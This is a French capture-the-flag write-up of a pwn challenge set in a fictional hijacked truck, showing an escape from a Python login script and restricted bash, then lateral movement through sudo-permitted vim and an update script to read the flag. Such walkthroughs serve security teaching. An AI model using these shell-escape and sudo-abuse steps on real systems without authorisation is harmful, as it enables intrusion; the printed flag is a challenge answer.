# Alone Muks (Pwn, 100 points)

## Énoncé

Lors de votre récent séjour à Evil Country, vous êtes parvenu à brancher un dispositif sur le camion effectuant la livraison. Il faut maintenant trouver une faille sur le système pour pouvoir prendre le contrôle du camion autonome de la marque Lates et le rediriger vers un point d'extraction. Un agent a posé un dispositif nous permettant d'accéder au système de divertissement du véhicule. A partir de ce dernier, remontez jusqu'au système de navigation.
Connectez-vous en SSH au camion

Identifiants: user:user

Port : 5004

Le flag est de la forme DGSESIEE{hash}

> **Note : le serveur est évidemment hors ligne, mais j'ai tenté de reconstituer le challenge sous forme d'une 
image Docker dont vous pouvez retrouver [la recette de construction ici](docker/).**



## Solution

Connectons nous sur ce camion : 

```console
$ ssh -p 1022 user@localhost
user@localhost's password: 
=============================================================

                 LATES Motors Inc                            

        LATES Mortors Entertainment System v6.2              

             Please enter your credentials                   
=============================================================
Username: plop
Password: coin
Wrong username !
Username: 
```

Ça commence. Arrêtons par Ctrl+c:

```console
^CTraceback (most recent call last):
  File "/home/user/login.py", line 12, in <module>
    user = raw_input("Username: ")    
KeyboardInterrupt
user@931e87377bb7:~$ 
```

Intéressant : on était dans un shell python d'authentification, mais maintenant on a un shell !

```console
user@931e87377bb7:~$ ls
-rbash: ls: command not found
user@931e87377bb7:~$ /bin/ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
user@931e87377bb7:~$ echo $PATH
/home/user/bin
user@931e87377bb7:~$ export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin
-rbash: PATH: readonly variable
$ echo bin/*
bin/date bin/python
user@931e87377bb7:~$ date
Sat Nov 14 08:32:37 UTC 2020
```

Malheureusement, on est dans un restricted bash (`rbash`), donc on ne peut pas appeler de commande en 
absolu, et le path contient un seul répertoire et est en lecture seule. Les seules commandes
disponibles dans ce path sont `date` et `python`... Attendez, mais on peut en faire des choses
avec python ! À commencer par spawner un véritable shell, et restaurer un environnement correct !

```console
$ python
Python 2.7.18 (default, Aug  4 2020, 11:16:42) 
[GCC 9.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
bash: groups: command not found
bash: dircolors: command not found
=============================================================

                 LATES Motors Inc                            

        LATES Mortors Entertainment System v6.2              

             Please enter your credentials                   
=============================================================
Username: ^CTraceback (most recent call last):
  File "/home/user/login.py", line 12, in <module>
    user = raw_input("Username: ")    
KeyboardInterrupt
user@931e87377bb7:~$ export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin
```

À partir de maintenant, on va explorer notre environnement, en commençant par le script
python qui assure l'authentification :

```console
user@931e87377bb7:~$ cat login.py 
print "============================================================="
print ""
print "                 LATES Motors Inc                            "
print ""
print "        LATES Mortors Entertainment System v6.2              "
print ""
print "             Please enter your credentials                   "
print "============================================================="
username = "dev"
password = "Sup3rStr0ngP4ssw0rd!!"
while 1:    
    user = raw_input("Username: ")    
    passw = raw_input("Password: ")
    if user == username:
        if password == passw:
            print "Welcome dev !"
            exit()
        else:
            print "Wrong password !"
    else:
        print "Wrong username !"
```

Rien d'intéressant. Rappelons-nous qu'on nous demande de se latéraliser vers le système 
de navigation. Voyons ce que le système nous dit à ce sujet :

```console
$ cat /etc/passwd
[...]
user:x:1000:1000:,,,:/home/user:/bin/rbash
globalSystem:x:1001:1001:,,,:/home/globalSystem:/bin/bash
navigationSystem:x:1002:1002:,,,:/home/navigationSystem:/bin/bash
user@931e87377bb7:~$ id globalSystem
uid=1001(globalSystem) gid=1001(globalSystem) groups=1001(globalSystem)
user@931e87377bb7:~$ id navigationSystem
uid=1002(navigationSystem) gid=1002(navigationSystem) groups=1002(navigationSystem)
```

On peut regarder les fichiers présents également :

```console
user@931e87377bb7:~$ find /home
/home
/home/user
/home/user/.bash_profile
/home/user/.bash_logout
/home/user/.profile
/home/user/.bashrc
/home/user/login.py
/home/user/bin
/home/user/bin/python
/home/user/bin/date
/home/user/.cache
/home/user/.cache/motd.legal-displayed
/home/navigationSystem
/home/navigationSystem/flag.txt
/home/navigationSystem/.bash_logout
/home/navigationSystem/.profile
/home/navigationSystem/.bashrc
/home/globalSystem
/home/globalSystem/.bash_logout
/home/globalSystem/.profile
/home/globalSystem/.bashrc
user@931e87377bb7:~$ ls -l /home/navigationSystem/flag.txt 
-r-------- 1 navigationSystem navigationSystem 38 Nov 14 08:28 /home/navigationSystem/flag.txt
```

Vu, on a trouvé le fichier contenant le flag, mais il ne nous est pas accessible dans l'immédiat. 
Cherchons d'autres fichiers associés à ces utilisateurs...

```console
user@931e87377bb7:~$ find / -user navigationSystem 2> /dev/null
/home/navigationSystem
/home/navigationSystem/flag.txt
/home/navigationSystem/.bash_logout
/home/navigationSystem/.profile
/home/navigationSystem/.bashrc
user@931e87377bb7:~$ find / -user globalSystem 2> /dev/null
/home/globalSystem
/home/globalSystem/.bash_logout
/home/globalSystem/.profile
/home/globalSystem/.bashrc
/usr/bin/update
user@931e87377bb7:~$ file /usr/bin/update
/usr/bin/update: ASCII text, with no line terminators
user@931e87377bb7:~$ cat /usr/bin/update
cat /home/navigationSystem/flag.txt
```

Découverte intéressante, le fichier /usr/bin/update qui appartient à globalSystem permet de lire 
le flag. Cela paraît bizarre au niveau des droits, mais ce n'est pas dû au hasard.

Autre point important, c'est de regarder les commandes `sudo` qui nous sont accessibles :
```console
user@931e87377bb7:~$ sudo -l
Matching Defaults entries for user on 931e87377bb7:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on 931e87377bb7:
    (globalSystem) NOPASSWD: /usr/bin/vim
```

Voilà qui est intéressant : on peut lancer l'éditeur vim avec l'identité de globalSystem ! Or, 
depuis vim, on peut aussi en faire des choses, comme par exemple lancer... un shell ! Lançons
donc vim avec la commande `sudo -u globalSystem /usr/bin/vim` puis lançons un shell avec `:!/bin/bash`.

```console
globalSystem@931e87377bb7:/home/user$ id
uid=1001(globalSystem) gid=1001(globalSystem) groups=1001(globalSystem)
globalSystem@931e87377bb7:/home/user$ /usr/bin/update
cat: /home/navigationSystem/flag.txt: Permission denied
```

Raté, on n'a toujours pas les droits pour lire le flag. Vérifions si nous avons de nouvelles commandes
disponibles :

```console
globalSystem@931e87377bb7:/home/user$ sudo -l
Matching Defaults entries for globalSystem on 931e87377bb7:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User globalSystem may run the following commands on 931e87377bb7:
    (navigationSystem) NOPASSWD: /usr/bin/update
```

Trop facile !

```console
globalSystem@931e87377bb7:/home/user$ sudo -u navigationSystem /usr/bin/update
DGSESIEE{44adfb64ff382f6433eeb03ed829afe0}
```